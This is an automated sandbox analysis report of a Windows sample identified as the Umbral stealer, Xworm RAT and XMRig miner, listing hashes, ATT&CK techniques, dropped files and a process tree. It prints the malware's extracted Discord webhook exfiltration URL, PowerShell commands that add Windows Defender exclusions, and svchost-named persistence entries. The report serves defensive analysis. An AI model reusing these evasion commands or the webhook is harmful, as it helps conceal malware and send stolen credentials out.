umbral | f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a

Analysis

max time kernel
150s
max time network
138s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
04-09-2024 11:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
Size

6.6MB
MD5

ddb357ac119ef185255a40c89c7f4036
SHA1

75bfbe9ff027e7fa1b238171106c8fcdac57961d
SHA256

f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a
SHA512

8338ed0f88b27ca8db7c2eb563f9173dc8b326de72cfedb99dc6c600658fbbbb817db75dc79a4fc509f58b236fe61d2ed7c54ce1dd173dcb53c8143ab19ab617
SSDEEP

196608:c3/TNvcXXG6dW0scvNrkSTgB3/RVpXDSJ2cg:gpvcXXGJjclrk53fZSJ2cg

Score

10^/10

umbral xmrig xworm credential_access discovery evasion execution miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1252680582354440374/YGnLESbYL-e0ySkeD-oZgw7qzQ6zGILUAto-79q0yWCLmXmZafvQ_AzE_o77RbZbKplc

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000800000001211a-27.dat	family_umbral
behavioral1/memory/2768-29-0x0000000001070000-0x00000000010B0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000004e74-13.dat	family_xworm
behavioral1/memory/2736-15-0x00000000011A0000-0x000000000126E000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/2088-607-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-609-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-613-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-612-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-611-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-610-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-606-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-837-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2088-838-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2104	powershell.exe
1264	powershell.exe
1784	powershell.exe
2820	powershell.exe
2644	powershell.exe
2388	powershell.exe
1924	powershell.exe
984	powershell.exe
2124	powershell.exe
2800	powershell.exe
1628	powershell.exe
2160	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	WaveHelper.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Wavee.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	Wavee.exe

Executes dropped EXE 6 IoCs

pid	Process
2736	Wavee.exe
2768	WaveHelper.exe
2660	WaveInstaller.exe
2912	WaveUpdateer.exe
476	Process not Found
1776	gmstcccpdzbb.exe

Loads dropped DLL 3 IoCs

pid	Process
2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
476	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2088-605-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-599-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-607-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-609-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-613-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-612-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-611-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-610-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-606-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-604-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-603-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-600-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-837-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2088-838-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost.exe"	Wavee.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
29	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1340	powercfg.exe
752	powercfg.exe
2108	powercfg.exe
2924	powercfg.exe
1792	powercfg.exe
1372	powercfg.exe
2072	powercfg.exe
2640	powercfg.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Wavee.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File created	C:\Windows\System32\WaveHelper.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File opened for modification	C:\Windows\System32\WaveHelper.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File created	C:\Windows\System32\WaveInstaller.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File opened for modification	C:\Windows\System32\WaveUpdateer.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File created	C:\Windows\System32\Wavee.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File opened for modification	C:\Windows\System32\WaveInstaller.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File created	C:\Windows\System32\WaveUpdateer.exe	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
File opened for modification	C:\Windows\System32\WaveHelper.exe	attrib.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1776 set thread context of 268	1776	gmstcccpdzbb.exe	100
PID 1776 set thread context of 2088	1776	gmstcccpdzbb.exe	105

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1620	sc.exe
1592	sc.exe
1728	sc.exe
700	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WaveInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2864	cmd.exe
1672	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2760	wmic.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0a0918bbafeda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "431609843"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B385B711-6AAD-11EF-853E-4605CC5911A3} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d854e951ecdca4792ad3aea80f03551000000000200000000001066000000010000200000001870ee98b6f118073501081046384c8318ab844b0645cfe95684816d828d694d000000000e8000000002000020000000538b843e881c7158313218df451b62fd3a6977bd30876d14d66dfe6f0507ae9290000000cfafa73b4921c17bfc160f6aa0093b115567dd2db8ffd811bfa4dbafd2b2492a40a7e42d95e45fa8640a4f05ada1e0b8298b6000d23fee12a0e5435066561b2f4812c2fd8e1fb57c3ba1eeb4735db2961de600ff829eb9ed8fefcf6ce18a5ade69d7d3a5b269fec23cf0ca3cd568f024cfcd735a06cccbbb9039955dc2d00985262070febdbbe731bdb62f1aec5cc9f240000000be6b4bee2b6d6ef9460417fb9e96b72d8089f4aeb74caa93c6106457b9fe895e04f8d5f7a6f8c1b893b353f647a0fa3f9d38138a70333c735b2440608a4f1d02	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d854e951ecdca4792ad3aea80f03551000000000200000000001066000000010000200000008ed4e905ccc2841b65763f9f9d59431c65bc92c3f79c27b9ada8325c7143b1fc000000000e8000000002000020000000dfff591e73a7f32e66c04ff53220b17c3f991927f696c04ee43f056582d9aeb120000000b20a9924fe0b65e348f6a3c5cb3e14ab294e08f002e262521a722ce1722eefa040000000347f923c4573cc22bda8f9ac881ed185bc335beabd33d96c5c0f3444b74a1aa70c6161f400cb81275f71f276bbdee6e39771e97f7cc4526c1908544b0be39217	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1672	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1784	powershell.exe
2820	powershell.exe
2644	powershell.exe
2388	powershell.exe
2104	powershell.exe
2800	powershell.exe
1628	powershell.exe
864	powershell.exe
1264	powershell.exe
1924	powershell.exe
984	powershell.exe
2124	powershell.exe
2160	powershell.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
2912	WaveUpdateer.exe
1776	gmstcccpdzbb.exe
1776	gmstcccpdzbb.exe
1776	gmstcccpdzbb.exe
1776	gmstcccpdzbb.exe
1776	gmstcccpdzbb.exe
1776	gmstcccpdzbb.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	2736	Wavee.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2768	WaveHelper.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	984	powershell.exe
Token: SeIncreaseQuotaPrivilege	2716	wmic.exe
Token: SeSecurityPrivilege	2716	wmic.exe
Token: SeTakeOwnershipPrivilege	2716	wmic.exe
Token: SeLoadDriverPrivilege	2716	wmic.exe
Token: SeSystemProfilePrivilege	2716	wmic.exe
Token: SeSystemtimePrivilege	2716	wmic.exe
Token: SeProfSingleProcessPrivilege	2716	wmic.exe
Token: SeIncBasePriorityPrivilege	2716	wmic.exe
Token: SeCreatePagefilePrivilege	2716	wmic.exe
Token: SeBackupPrivilege	2716	wmic.exe
Token: SeRestorePrivilege	2716	wmic.exe
Token: SeShutdownPrivilege	2716	wmic.exe
Token: SeDebugPrivilege	2716	wmic.exe
Token: SeSystemEnvironmentPrivilege	2716	wmic.exe
Token: SeRemoteShutdownPrivilege	2716	wmic.exe
Token: SeUndockPrivilege	2716	wmic.exe
Token: SeManageVolumePrivilege	2716	wmic.exe
Token: 33	2716	wmic.exe
Token: 34	2716	wmic.exe
Token: 35	2716	wmic.exe
Token: SeIncreaseQuotaPrivilege	2716	wmic.exe
Token: SeSecurityPrivilege	2716	wmic.exe
Token: SeTakeOwnershipPrivilege	2716	wmic.exe
Token: SeLoadDriverPrivilege	2716	wmic.exe
Token: SeSystemProfilePrivilege	2716	wmic.exe
Token: SeSystemtimePrivilege	2716	wmic.exe
Token: SeProfSingleProcessPrivilege	2716	wmic.exe
Token: SeIncBasePriorityPrivilege	2716	wmic.exe
Token: SeCreatePagefilePrivilege	2716	wmic.exe
Token: SeBackupPrivilege	2716	wmic.exe
Token: SeRestorePrivilege	2716	wmic.exe
Token: SeShutdownPrivilege	2716	wmic.exe
Token: SeDebugPrivilege	2716	wmic.exe
Token: SeSystemEnvironmentPrivilege	2716	wmic.exe
Token: SeRemoteShutdownPrivilege	2716	wmic.exe
Token: SeUndockPrivilege	2716	wmic.exe
Token: SeManageVolumePrivilege	2716	wmic.exe
Token: 33	2716	wmic.exe
Token: 34	2716	wmic.exe
Token: 35	2716	wmic.exe
Token: SeIncreaseQuotaPrivilege	2388	wmic.exe
Token: SeSecurityPrivilege	2388	wmic.exe
Token: SeTakeOwnershipPrivilege	2388	wmic.exe
Token: SeLoadDriverPrivilege	2388	wmic.exe
Token: SeSystemProfilePrivilege	2388	wmic.exe
Token: SeSystemtimePrivilege	2388	wmic.exe
Token: SeProfSingleProcessPrivilege	2388	wmic.exe
Token: SeIncBasePriorityPrivilege	2388	wmic.exe
Token: SeCreatePagefilePrivilege	2388	wmic.exe
Token: SeBackupPrivilege	2388	wmic.exe
Token: SeRestorePrivilege	2388	wmic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
656	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
656	iexplore.exe
656	iexplore.exe
1048	IEXPLORE.EXE
1048	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 1784	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	30
PID 2384 wrote to memory of 1784	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	30
PID 2384 wrote to memory of 1784	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	30
PID 2384 wrote to memory of 2736	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	32
PID 2384 wrote to memory of 2736	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	32
PID 2384 wrote to memory of 2736	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	32
PID 2384 wrote to memory of 2820	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	33
PID 2384 wrote to memory of 2820	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	33
PID 2384 wrote to memory of 2820	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	33
PID 2384 wrote to memory of 2768	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	35
PID 2384 wrote to memory of 2768	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	35
PID 2384 wrote to memory of 2768	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	35
PID 2384 wrote to memory of 2644	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	36
PID 2384 wrote to memory of 2644	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	36
PID 2384 wrote to memory of 2644	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	36
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2660	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	38
PID 2384 wrote to memory of 2388	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	39
PID 2384 wrote to memory of 2388	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	39
PID 2384 wrote to memory of 2388	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	39
PID 2384 wrote to memory of 2912	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	41
PID 2384 wrote to memory of 2912	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	41
PID 2384 wrote to memory of 2912	2384	f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe	41
PID 2660 wrote to memory of 656	2660	WaveInstaller.exe	42
PID 2660 wrote to memory of 656	2660	WaveInstaller.exe	42
PID 2660 wrote to memory of 656	2660	WaveInstaller.exe	42
PID 2660 wrote to memory of 656	2660	WaveInstaller.exe	42
PID 656 wrote to memory of 1048	656	iexplore.exe	44
PID 656 wrote to memory of 1048	656	iexplore.exe	44
PID 656 wrote to memory of 1048	656	iexplore.exe	44
PID 656 wrote to memory of 1048	656	iexplore.exe	44
PID 2768 wrote to memory of 1780	2768	WaveHelper.exe	45
PID 2768 wrote to memory of 1780	2768	WaveHelper.exe	45
PID 2768 wrote to memory of 1780	2768	WaveHelper.exe	45
PID 2768 wrote to memory of 2104	2768	WaveHelper.exe	47
PID 2768 wrote to memory of 2104	2768	WaveHelper.exe	47
PID 2768 wrote to memory of 2104	2768	WaveHelper.exe	47
PID 2768 wrote to memory of 2800	2768	WaveHelper.exe	49
PID 2768 wrote to memory of 2800	2768	WaveHelper.exe	49
PID 2768 wrote to memory of 2800	2768	WaveHelper.exe	49
PID 2768 wrote to memory of 1628	2768	WaveHelper.exe	52
PID 2768 wrote to memory of 1628	2768	WaveHelper.exe	52
PID 2768 wrote to memory of 1628	2768	WaveHelper.exe	52
PID 2768 wrote to memory of 864	2768	WaveHelper.exe	55
PID 2768 wrote to memory of 864	2768	WaveHelper.exe	55
PID 2768 wrote to memory of 864	2768	WaveHelper.exe	55
PID 2736 wrote to memory of 1264	2736	Wavee.exe	57
PID 2736 wrote to memory of 1264	2736	Wavee.exe	57
PID 2736 wrote to memory of 1264	2736	Wavee.exe	57
PID 2736 wrote to memory of 1924	2736	Wavee.exe	59
PID 2736 wrote to memory of 1924	2736	Wavee.exe	59
PID 2736 wrote to memory of 1924	2736	Wavee.exe	59
PID 2736 wrote to memory of 984	2736	Wavee.exe	61
PID 2736 wrote to memory of 984	2736	Wavee.exe	61
PID 2736 wrote to memory of 984	2736	Wavee.exe	61
PID 2768 wrote to memory of 2716	2768	WaveHelper.exe	63
PID 2768 wrote to memory of 2716	2768	WaveHelper.exe	63
PID 2768 wrote to memory of 2716	2768	WaveHelper.exe	63
PID 2768 wrote to memory of 2388	2768	WaveHelper.exe	65

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1780	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe
"C:\Users\Admin\AppData\Local\Temp\f437564b0cbad3ff7584c5a2efc4cd446a4183121c81ae41a5c6d52cba754c5a.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Wavee.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\System32\Wavee.exe
  "C:\Windows\System32\Wavee.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Wavee.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wavee.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
